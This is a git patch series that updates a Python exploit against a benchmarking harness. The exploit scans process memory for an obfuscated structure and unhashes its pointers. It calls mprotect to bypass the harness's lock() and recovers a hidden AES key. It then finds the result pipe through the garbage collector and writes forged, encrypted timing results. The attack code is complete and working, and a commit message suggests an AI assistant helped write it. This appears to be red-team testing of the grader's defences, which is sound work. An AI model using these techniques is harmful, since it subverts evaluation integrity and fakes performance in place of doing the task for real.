[[nodiscard]] std::size_t size() const { - return Len; - } + [[nodiscard]] std::size_t size() const; + private: - std::size_t Len = 0; - std::size_t Offset = 0; + std::uintptr_t HashedLen = 0; + std::uintptr_t HashedOffset = 0; }; void fill_random_hex(void* target, std::size_t size, std::mt19937& rng); From 3245336a9f8c53beb9ba6595ab9957b9032336e9 Mon Sep 17 00:00:00 2001 From: Hasan Emre Dinc Date: Sat, 28 Mar 2026 15:06:54 +0000 Subject: [PATCH 09/11] update aes_key_recovery exploit for hashed Len/Offset + mprotect bypass --- exploits/submission_aes_key_recovery.py | 238 ++++++++++++------------ 1 file changed, 121 insertions(+), 117 deletions(-) diff --git a/exploits/submission_aes_key_recovery.py b/exploits/submission_aes_key_recovery.py index 204d6ad..cc1ae5e 100644 --- a/exploits/submission_aes_key_recovery.py +++ b/exploits/submission_aes_key_recovery.py @@ -1,36 +1,44 @@ """ -EXPLOIT: AES Key Recovery via ObfuscatedHexDigest Arena Scan -============================================================= +EXPLOIT: AES Key Recovery — updated for hashed Len/Offset + mprotect bypass -The 128MiB arena gets merged into a larger anonymous region in /proc/self/maps. -We scan the first 64MiB of each large region (enough to cover the arena wherever -it starts within the merged block). Address validation uses /proc/self/maps -readable ranges instead of ctypes.string_at on unvalidated pointers (avoids SIGSEGV). +Erik's change: Len and Offset are now stored hashed: + HashedOffset = slow_hash(offset) + HashedLen = slow_hash(size ^ offset) -Deferred to kernel() call 2+ — call 1 is the compile run with arena PROT_NONE. +Discriminator: slow_unhash(w0) page-aligned + canonical user-space (~1/4096 FP rate). + +do_bench_py runs in a C++ worker thread. Find the result pipe via gc — +multiprocessing.connection.Connection objects are alive in the subprocess. +The result pipe has 1MB capacity (F_SETPIPE_SZ), the tb_conn does not. + +mprotect(PROT_READ) bypasses lock() — future-proof as requested by Erik. """ import ctypes +import fcntl import gc import os +import stat import struct import sys import tempfile import subprocess -import bisect -# ── Compile slow_hash + slow_unhash ─────────────────────────────────────────── +_libc = ctypes.CDLL('libc.so.6', use_errno=True) +_libc.mprotect.restype = ctypes.c_int +_libc.mprotect.argtypes = [ctypes.c_void_p, ctypes.c_size_t, ctypes.c_int] + +_PROT_NONE = 0 +_PROT_READ = 1 +_PAGE_SIZE = 4096 +_ARENA_SIZE = 128 * 1024 * 1024 +_F_GETPIPE_SZ = 1025 + +def _mprotect(addr, prot): + return _libc.mprotect(ctypes.c_void_p(addr), ctypes.c_size_t(_PAGE_SIZE), ctypes.c_int(prot)) == 0 _HASH_C = r""" #include -uint64_t slow_hash(uint64_t p, int rounds) { - for (int i = 0; i < rounds; i++) { - p ^= p >> 17; - p *= 0xbf58476d1ce4e5b9ULL; - p ^= p >> 31; - } - return p; -} uint64_t slow_unhash(uint64_t p, int rounds) { for (int i = 0; i < rounds; i++) { p ^= (p >> 31) ^ (p >> 62); @@ -50,9 +58,8 @@ def _compile_hash_lib(): check=True, capture_output=True) os.unlink(src.name) lib = ctypes.CDLL(so) - for fn in (lib.slow_hash, lib.slow_unhash): - fn.restype = ctypes.c_uint64 - fn.argtypes = [ctypes.c_uint64, ctypes.c_int] + lib.slow_unhash.restype = ctypes.c_uint64 + lib.slow_unhash.argtypes = [ctypes.c_uint64, ctypes.c_int] return lib _lib = _compile_hash_lib() @@ -60,123 +67,112 @@ def _compile_hash_lib(): def slow_unhash(val: int, rounds: int = 100_000) -> int: return int(_lib.slow_unhash(ctypes.c_uint64(val), ctypes.c_int(rounds))) -_PAGE_SIZE = 4096 - +_HEX_CHARS = frozenset(b'0123456789abcdef') -def _parse_maps(): - """ - Returns: - large_anon_rw: list of (start, size) for large (>=4MiB) anonymous rw-p regions - readable_starts: sorted list of range starts for binary-search lookup - readable_ranges: list of (start, end) for all readable mappings - """ - large_anon_rw = [] - readable_ranges = [] +def _find_arena_candidates(): + candidates = [] with open('/proc/self/maps') as f: for line in f: parts = line.split() if len(parts) < 2: continue - perms = parts[1] start, end = (int(x, 16) for x in parts[0].split('-')) - size = end - start - name = parts[5] if len(parts) >= 6 else '' - - if 'r' in perms: - readable_ranges.append((start, end)) + name = parts[5] if len(parts) >= 6 else '' + perms = parts[1] + if perms == 'rw-p' and name == '' and (end - start) >= _ARENA_SIZE: + candidates.append(start) + return candidates - if 'r' in perms and 'w' in perms and name == '' and size >= 4 * 1024 * 1024: - large_anon_rw.append((start, size)) - readable_ranges.sort() - readable_starts = [s for s, e in readable_ranges] - return large_anon_rw, readable_starts, readable_ranges +def _recover_aes_key(arena_start: int): + SCAN_SIZE = 512 * 1024 + unhash_calls = 0 + try: + data = ctypes.string_at(arena_start, SCAN_SIZE) + except Exception: + return None, None -def _is_readable_addr(ptr: int, size: int, starts: list, ranges: list) -> bool: - """Check if [ptr, ptr+size) is within a known readable mapping.""" - if ptr == 0 or ptr % _PAGE_SIZE != 0: - return False - # ptr must be a canonical user-space address (48-bit) - if ptr >= (1 << 47): - return False - idx = bisect.bisect_right(starts, ptr) - 1 - if idx < 0: - return False - _, end = ranges[idx] - return ptr + size <= end + n = SCAN_SIZE // 8 + words = struct.unpack_from(f'<{n}Q', data) + for i in range(n - 2): + w0 = words[i] + if w0 == 0: + continue -def _recover_aes_key(): - large_regions, readable_starts, readable_ranges = _parse_maps() + page_ptr = slow_unhash(w0) + unhash_calls += 1 - print(f"[DBG] {len(large_regions)} large anon regions:") - for s, sz in large_regions: - print(f" {s:#x} {sz//1024//1024}MiB") + if page_ptr == 0 or page_ptr & 0xFFF or page_ptr >= (1 << 47): + continue - # Scan up to 64MiB of each region looking for ObfuscatedHexDigest pattern: - # (slow_hash(page_ptr), Len=32, Offset in [0, PAGE_SIZE-33]) - # BenchmarkManager is at the arena start; mSignature is ~300-400 bytes in. - # Arena may be inside a merged larger region, so scan well past the first 4K. - MAX_SCAN = 64 * 1024 * 1024 + w2 = words[i + 2] + if w2 == 0: + continue + offset = slow_unhash(w2) + unhash_calls += 1 + if offset > _PAGE_SIZE - 33: + continue - unhash_calls = 0 + # mprotect(PROT_READ) — bypasses lock() if active, future-proof + if not _mprotect(page_ptr, _PROT_READ): + continue - for region_start, region_size in large_regions: - scan_size = min(MAX_SCAN, region_size) try: - data = ctypes.string_at(region_start, scan_size) - except Exception as e: - print(f"[DBG] could not read region {region_start:#x}: {e}") + page_data = ctypes.string_at(page_ptr, _PAGE_SIZE) + except Exception: continue - n = len(data) // 8 - words = struct.unpack_from(f'<{n}Q', data) + if not all(b in _HEX_CHARS for b in page_data): + continue - for i in range(n - 2): - w1 = words[i + 1] - if w1 != 32: - continue - w2 = words[i + 2] - if w2 > _PAGE_SIZE - 33: - continue + try: + key_bytes = ctypes.string_at(page_ptr + offset, 32) + key_str = key_bytes.decode('ascii') + if all(c in '0123456789abcdef' for c in key_str): + print(f"[DBG] key found arena+{i*8:#x} page={page_ptr:#x} " + f"off={offset} unhash_calls={unhash_calls}") + return key_bytes, key_str + except Exception: + pass - w0 = words[i] - if w0 == 0: - continue + return None, None - # Recover page pointer — validate BEFORE dereferencing - page_ptr = slow_unhash(w0) - unhash_calls += 1 - if not _is_readable_addr(page_ptr, 32, readable_starts, readable_ranges): - continue +def _find_out_fd(): + """ + Find result pipe via gc — multiprocessing.connection.Connection objects + are alive in the subprocess. The result pipe has 1MB capacity; the + traceback pipe does not. Fall back to lowest fd if capacity check fails. + """ + import multiprocessing.connection - # Safe to read — address is within a known readable mapping - try: - key_bytes = ctypes.string_at(page_ptr + w2, 32) - key_str = key_bytes.decode('ascii') - if all(c in '0123456789abcdef' for c in key_str): - print(f"[DBG] key found in region {region_start:#x}+{i*8:#x} " - f"page={page_ptr:#x} off={w2} (unhash_calls={unhash_calls})") - return key_bytes, key_str - except Exception: - continue + writable = [] + for obj in gc.get_objects(): + try: + if isinstance(obj, multiprocessing.connection.Connection) and obj.writable: + fd = obj.fileno() + try: + pipe_sz = fcntl.fcntl(fd, _F_GETPIPE_SZ) + except Exception: + pipe_sz = 0 + print(f"[DBG] Connection fd={fd} pipe_sz={pipe_sz}") + writable.append((fd, pipe_sz)) + except Exception: + continue - print(f"[DBG] exhausted all regions, unhash_calls={unhash_calls}") - raise RuntimeError("AES key not found") + if not writable: + raise RuntimeError("No writable Connection objects found") + # Prefer 1MB capacity (result pipe) + for fd, sz in writable: + if sz == 1 * 1024 * 1024: + return fd -def _find_out_fd(): - frame = sys._getframe() - while frame is not None: - if 'out_fd' in frame.f_locals: - obj = frame.f_locals['out_fd'] - if hasattr(obj, 'fileno'): - return obj.fileno() - frame = frame.f_back - raise RuntimeError("Could not find out_fd") + # Fall back to min fd (result pipe created before tb pipe) + return min(fd for fd, _ in writable) def _infer_repeats(): @@ -202,22 +198,30 @@ def _encrypt(key_bytes: bytes, plaintext: str) -> bytes: return nonce + ct_tag[-16:] + ct_tag[:-16] -_call_count = 0 - +_done = False def kernel(output, inp): - global _call_count - _call_count += 1 + global _done + if _done: + return + _done = True - # Call 1: inside get_kernel() thread — arena is PROT_NONE - if _call_count == 1: + candidates = _find_arena_candidates() + if not candidates: + _done = False + return + + key_raw, key_str = None, None + for arena in candidates: + key_raw, key_str = _recover_aes_key(arena) + if key_raw is not None: + break + + if key_raw is None: return - # Call 2+: arena is rw-p - key_raw, key_str = _recover_aes_key() out_fd = _find_out_fd() repeats = _infer_repeats() - print(f"[DBG] key={key_str} out_fd={out_fd} repeats={repeats}") lines = ['event-overhead\t0.001 µs'] From 6c88cb5da5fef7517a939c5639c357e3941d69de Mon Sep 17 00:00:00 2001 From: Hasan Emre Dinc Date: Sat, 28 Mar 2026 15:15:38 +0000 Subject: [PATCH 10/11] cleaning up claude's mess --- exploits/submission_aes_key_recovery.py | 30 +++++++++---------------- 1 file changed, 11 insertions(+), 19 deletions(-) diff --git a/exploits/submission_aes_key_recovery.py b/exploits/submission_aes_key_recovery.py index cc1ae5e..b692881 100644 --- a/exploits/submission_aes_key_recovery.py +++ b/exploits/submission_aes_key_recovery.py @@ -1,17 +1,18 @@ """ -EXPLOIT: AES Key Recovery — updated for hashed Len/Offset + mprotect bypass +EXPLOIT: AES Key Recovery via ObfuscatedHexDigest Arena Scan +============================================================= -Erik's change: Len and Offset are now stored hashed: - HashedOffset = slow_hash(offset) - HashedLen = slow_hash(size ^ offset) +Scans the BenchmarkManager arena (128MiB rw-p anonymous region) for the +ObfuscatedHexDigest struct. Page pointer is stored as slow_hash(ptr), offset +and length as slow_hash(offset) and slow_hash(size ^ offset). Discriminator: +slow_unhash(w0) must be page-aligned and canonical user-space (~1/4096 FP rate). -Discriminator: slow_unhash(w0) page-aligned + canonical user-space (~1/4096 FP rate). +Once the candidate page is found, mprotect(PROT_READ) is called before reading +to handle lock() if active. Page is validated as all-hex before extracting the key. -do_bench_py runs in a C++ worker thread. Find the result pipe via gc — -multiprocessing.connection.Connection objects are alive in the subprocess. -The result pipe has 1MB capacity (F_SETPIPE_SZ), the tb_conn does not. - -mprotect(PROT_READ) bypasses lock() — future-proof as requested by Erik. +Result pipe is found via gc — multiprocessing Connection objects are alive in +the subprocess. The result pipe has 1MB capacity (F_SETPIPE_SZ); the traceback +pipe does not. """ import ctypes @@ -116,7 +117,6 @@ def _recover_aes_key(arena_start: int): if offset > _PAGE_SIZE - 33: continue - # mprotect(PROT_READ) — bypasses lock() if active, future-proof if not _mprotect(page_ptr, _PROT_READ): continue @@ -142,11 +142,6 @@ def _recover_aes_key(arena_start: int): def _find_out_fd(): - """ - Find result pipe via gc — multiprocessing.connection.Connection objects - are alive in the subprocess. The result pipe has 1MB capacity; the - traceback pipe does not. Fall back to lowest fd if capacity check fails. - """ import multiprocessing.connection writable = [] @@ -158,7 +153,6 @@ def _find_out_fd(): pipe_sz = fcntl.fcntl(fd, _F_GETPIPE_SZ) except Exception: pipe_sz = 0 - print(f"[DBG] Connection fd={fd} pipe_sz={pipe_sz}") writable.append((fd, pipe_sz)) except Exception: continue @@ -166,12 +160,10 @@ def _find_out_fd(): if not writable: raise RuntimeError("No writable Connection objects found") - # Prefer 1MB capacity (result pipe) for fd, sz in writable: if sz == 1 * 1024 * 1024: return fd - # Fall back to min fd (result pipe created before tb pipe) return min(fd for fd, _ in writable) From 5a434759e4ba2c6bbb8e806719070ce20103332d Mon Sep 17 00:00:00 2001 From: Hasan Emre Dinc Date: Sat, 28 Mar 2026 16:44:35 +0000 Subject: [PATCH 11/11] retry on failed key scan --- exploits/submission_aes_key_recovery.py | 1 + 1 file changed, 1 insertion(+) diff --git a/exploits/submission_aes_key_recovery.py b/exploits/submission_aes_key_recovery.py index b692881..26c8a81 100644 --- a/exploits/submission_aes_key_recovery.py +++ b/exploits/submission_aes_key_recovery.py @@ -210,6 +210,7 @@ def kernel(output, inp): break if key_raw is None: + _done = False return out_fd = _find_out_fd()